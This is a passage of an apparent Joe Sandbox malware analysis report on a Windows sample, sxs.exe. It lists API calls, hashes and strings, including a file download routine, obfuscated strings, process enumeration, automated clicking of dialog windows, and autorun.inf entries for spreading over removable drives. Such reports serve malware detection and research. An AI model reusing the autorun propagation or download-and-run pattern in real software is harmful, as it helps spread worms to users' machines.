                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,?,?,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439D1B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
                                                                            • Instruction ID: 794ef5d78045ed4d742bdaeeac8ed0779eb977f76541356490a23fe8d5b0fb08
                                                                            • Opcode Fuzzy Hash: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
                                                                            • Instruction Fuzzy Hash: 3EF0B4B26493207AF124670AAC8BF973F5CDF85B75F00042AF64D5A1C1E4997C10C2BA
                                                                            Function 004381FA Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,004381FA,004381FA,004381FA), ref: 00438265
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
                                                                            • Instruction ID: cf7fc80abf0a610b938b0f6de2e472192636330f029e0b36f2c69517e1b1d411
                                                                            • Opcode Fuzzy Hash: 43f065defaea95145b3ecdcf874f9926135ac585ebd2532a17b86c1669fef322
                                                                            • Instruction Fuzzy Hash: E5018831A443189BDB359E29CC04BDAB7B1EB44750F2104ADF584B7281CAB4AE808E08
                                                                            Function 0040285C Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
                                                                            • Instruction ID: 24a9b9a5f53f68d2e9ae0a20dfd92328ab467e55e5b9cffb966d9a0b50497f93
                                                                            • Opcode Fuzzy Hash: 8ae584e4023b59ee75ab96c522648a8cbc719458c716cde17b53aa8cd14c598c
                                                                            • Instruction Fuzzy Hash: 48A022C222330002C80022F20CC2EA2808CA2082EA3A000A23000C00A3C82C08800020
                                                                            Function 00531856 Relevance: 1.3, APIs: 1, Instructions: 7sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 83ba358f1d4f9be8f70de9c75f6af8435493c9470f2672efbf93f82a94d27bc8
                                                                            • Instruction ID: 35db9f488ffd0636bb9cf030617f311de7711ba3a97448446235c477cbc56070
                                                                            • Opcode Fuzzy Hash: 83ba358f1d4f9be8f70de9c75f6af8435493c9470f2672efbf93f82a94d27bc8
                                                                            • Instruction Fuzzy Hash: 76B01233508B01A7820E6BB09D0F80A7B976BA4B03F40D426F308880B0CFB09414FA1D
                                                                            Function 005311B6 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,005316A6,00001000), ref: 005311C3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 62a7b74bd76db8a5fc26b65ac9bd9eaa107a16f2abf41db949a32e9ff1b8fa1d
                                                                            • Instruction ID: 1fcb65d395787b0b6db5600859cc9b342ae49ae71f3942b2a60d767fcdcba42f
                                                                            • Opcode Fuzzy Hash: 62a7b74bd76db8a5fc26b65ac9bd9eaa107a16f2abf41db949a32e9ff1b8fa1d
                                                                            • Instruction Fuzzy Hash: EBB012302843007AFD1107404D0EF0436116744B42F108000B348280D041F05004D60A
                                                                            Function 005311CA Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNELBASE(00008000,00000000,00008000,00531847,00000000), ref: 005311D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 3f1d20d579311b3a40eb1c4a4ad8a342f9f540bd2fe59f4924e8cb646b54176f
                                                                            • Instruction ID: 144dc3af3683bfe869fbd5cbf28f188937a1f9eb92b5d81924be8f1420cf068f
                                                                            • Opcode Fuzzy Hash: 3f1d20d579311b3a40eb1c4a4ad8a342f9f540bd2fe59f4924e8cb646b54176f
                                                                            • Instruction Fuzzy Hash: D3A00170684A00AAEE695B11AE0EB097A61AB90B11F20C554B299681E09AB16418EA0A
                                                                            Function 004084B8 Relevance: 1.3, APIs: 1, Instructions: 4sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(000493E0), ref: 004084BD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectedInternetSleepState
                                                                            • String ID:
                                                                            • API String ID: 1839875000-0
                                                                            • Opcode ID: 9f89b1ffa88328b633213964eacc77fe1f4eb6ec4a26f25899b98c99db20ae36
                                                                            • Instruction ID: 531a484f82c7889d25c20d7142e9803b131f223dc912937a257ed96ba5c7c79c
                                                                            • Opcode Fuzzy Hash: 9f89b1ffa88328b633213964eacc77fe1f4eb6ec4a26f25899b98c99db20ae36
                                                                            • Instruction Fuzzy Hash:

                                                                            Non-executed Functions

                                                                            Function 00404A98 Relevance: 3.0, APIs: 2, Instructions: 24nativewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostQuitMessage.USER32(00000000), ref: 00404AAA
                                                                            • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00404ABE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: MessageNtdllPostProc_QuitWindow
                                                                            • String ID:
                                                                            • API String ID: 4264772764-0
                                                                            • Opcode ID: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction ID: 6d0fe3e5f2a624f7a99d633fdd4a9b0fdd2fbeae9b853d00227d1a052b52fcf1
                                                                            • Opcode Fuzzy Hash: 09b9339f5cc573032236493d8dceb665ca5f08ba7ea5b0146747c0737a21e41f
                                                                            • Instruction Fuzzy Hash: 68E046B13442086BCB00DEAA8CC1E5BB3DDABC8214F50C12ABA08D7285D574E8018AA9
                                                                            Function 007418A1 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersionExA.KERNEL32(?), ref: 007418BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2016766274.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: true
                                                                            • Associated: 00000000.00000003.2016766274.0000000000745000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_740000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Version
                                                                            • String ID:
                                                                            • API String ID: 1889659487-0
                                                                            • Opcode ID: fc46c89cc6669fe53aa51f048b9e8b1c9051d1b074ad228ddea146efbf931b30
                                                                            • Instruction ID: 9a8a1141fc990af0d292a022f824ee0b617b5088e6ebc60193ffa7bf56dd5f76
                                                                            • Opcode Fuzzy Hash: fc46c89cc6669fe53aa51f048b9e8b1c9051d1b074ad228ddea146efbf931b30
                                                                            • Instruction Fuzzy Hash: B1E01734A1071846EF20AB34A906B8677B8A7013ACF840690A62AE21C1DBB8DDC68B54
                                                                            Function 00402728 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemTime.KERNEL32(?), ref: 00402732
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: SystemTime
                                                                            • String ID:
                                                                            • API String ID: 2656138-0
                                                                            • Opcode ID: 5156aabc912fc50372921c0480e37dbfba616d34ec33de77a1d74ffcab7036cd
                                                                            • Instruction ID: 805d3a75e049a96d722e3c4be3184c0ca47e53fa78bbd974ff5fbb880fea3dac
                                                                            • Opcode Fuzzy Hash: 5156aabc912fc50372921c0480e37dbfba616d34ec33de77a1d74ffcab7036cd
                                                                            • Instruction Fuzzy Hash: 2FE04F11E0010A52C704ABA5CD435EDF7AEAB95604F448173A818E62E1F636C755C348
                                                                            Function 00700C12 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.2018675684.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_700000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %p
                                                                            • API String ID: 0-1515977560
                                                                            • Opcode ID: a3ae2da95a24d441c72884095fef37606b3857af02e8944012f1e8f9deb04d28
                                                                            • Instruction ID: dfbeba827e02e1d9acef4e13243fbbe5bf073df9ba78c386d88f0cbe16697f13
                                                                            • Opcode Fuzzy Hash: a3ae2da95a24d441c72884095fef37606b3857af02e8944012f1e8f9deb04d28
                                                                            • Instruction Fuzzy Hash: 4331E475715A424FE308CE7AC89005AFBE2FBC9248758C67CE596D7B06C270E61AD790
                                                                            Function 00404540 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                            • API String ID: 667068680-597814768
                                                                            • Opcode ID: 6916ce2368bd7bf410b6b2501a9db0e96e5eb6e71815e111a167491911190605
                                                                            • Instruction ID: 023e8f8eb36bf4682933e0370cb39b54a2ce952b5e9d5c020180350aed9ba6c9
                                                                            • Opcode Fuzzy Hash: 6916ce2368bd7bf410b6b2501a9db0e96e5eb6e71815e111a167491911190605
                                                                            • Instruction Fuzzy Hash: 6231C9F06403509FDB11EBB5AA85A2933E8EB96305750657ABA00EF6D4D77CC810CB1E
                                                                            Function 004058D0 Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 219filesleepnetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405970
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725,?,00000000,?,00407FF7,00000001,00000000), ref: 00405982
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 004059A7
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000,?,00406702,00406725), ref: 004059B5
                                                                            • GetEnvironmentVariableA.KERNEL32(ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B,?,00000000,00000000), ref: 00405A2E
                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405A3B
                                                                            • SHGetPathFromIDList.SHELL32(?,?), ref: 00405A4B
                                                                              • Part of subcall function 00404D04: GetVersionExA.KERNEL32(?,?,004072CF,00000000,0040775D,?,00000003,00000000,00000000), ref: 00404D15
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405C8B), ref: 00405C3C
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000010,?,ProgramFiles,?,00000100,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405C4E
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405C60
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$DownloadEnvironmentFolderFromListLocationPathSpecialVariableVersion
                                                                            • String ID: MfimBljf9$MfimMkbf|86$ProgramFiles$XLhwawhfp%C{tiiqaw(vvi$XLhwawhfp%C{tiiqawZja}vokwc-a}c$_LhwawhfpVnlvqevpX$llc-p}r$lqrs>*)nwb(wimg`o`t-gjk,m`(w|q$qwj>
                                                                            • API String ID: 1888836333-1695214238
                                                                            • Opcode ID: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
                                                                            • Instruction ID: a5c779206b19b53d33bbc18893a0be02a82dcc92b5c72ba9f95bed763f7d3347
                                                                            • Opcode Fuzzy Hash: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
                                                                            • Instruction Fuzzy Hash: D09103746012099BD710FB65DD4AA8E77B8EF84308F1040BBB504BB2E3DA78AE418F5D
                                                                            Function 00406C30 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 207windowsleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • FindWindowA.USER32(#32770,00000000), ref: 00406CE5
                                                                            • GetWindowTextA.USER32(00000000,0040AEDC,00000104), ref: 00406D17
                                                                            • FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406DC3
                                                                            • FindWindowExA.USER32(00000000,00000000,AfxWnd42,00000000), ref: 00406DE1
                                                                            • FindWindowExA.USER32(00000000,00000000,RICHEDIT,00000000), ref: 00406DFF
                                                                            • FindWindowExA.USER32(00000000,00000000,Button,00406F50), ref: 00406E20
                                                                            • FindWindowExA.USER32(00000000,00000000,RichEdit20A,00000000), ref: 00406E3E
                                                                            • SendMessageA.USER32(00000000,000000C2,000000B4,00000000), ref: 00406E7E
                                                                            • Sleep.KERNEL32(000002BC,00000000,000000C2,000000B4,00000000,00000000,00000000,RichEdit20A,00000000,00000000,00000000,Button,00406F50,00000000,00000000,RICHEDIT), ref: 00406E88
                                                                            • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00406E9E
                                                                            • SendMessageA.USER32(00000000,0000000C,00000000,00406F70), ref: 00406EB4
                                                                            • FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406ECC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Find$MessageSend$DirectorySleepTextWindows
                                                                            • String ID: #32770$AfxWnd42$Button$RICHEDIT$RichEdit20A$bbyb.dll
                                                                            • API String ID: 4044579835-3821104793
                                                                            • Opcode ID: 2b7c7420146259d1b63771cbd3506dc523231e8cc6493d49fbb382b1b43dd8cc
                                                                            • Instruction ID: c2cdf916bea0aacb3b287b9c217ab58656c52756c70eb46c7f93f36c1c6821be
                                                                            • Opcode Fuzzy Hash: 2b7c7420146259d1b63771cbd3506dc523231e8cc6493d49fbb382b1b43dd8cc
                                                                            • Instruction Fuzzy Hash: 53813670340206AFE710EF64D986F5A77A9EB85704F51407AF901BB2E2D7B8AD50CB9C
                                                                            Function 00406354 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 211fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004063BF
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406420
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406440
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406468
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 0040648B
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064A9
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064C7
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A), ref: 004064EB
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0040651C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 004065F8
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406618
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Delete$CopyDriveModuleNameType
                                                                            • String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
                                                                            • API String ID: 4177304369-1696378998
                                                                            • Opcode ID: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
                                                                            • Instruction ID: d6a08cfd8c4e4eb5d113470b4235742803baeb825baf014acef4385ded9ab805
                                                                            • Opcode Fuzzy Hash: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
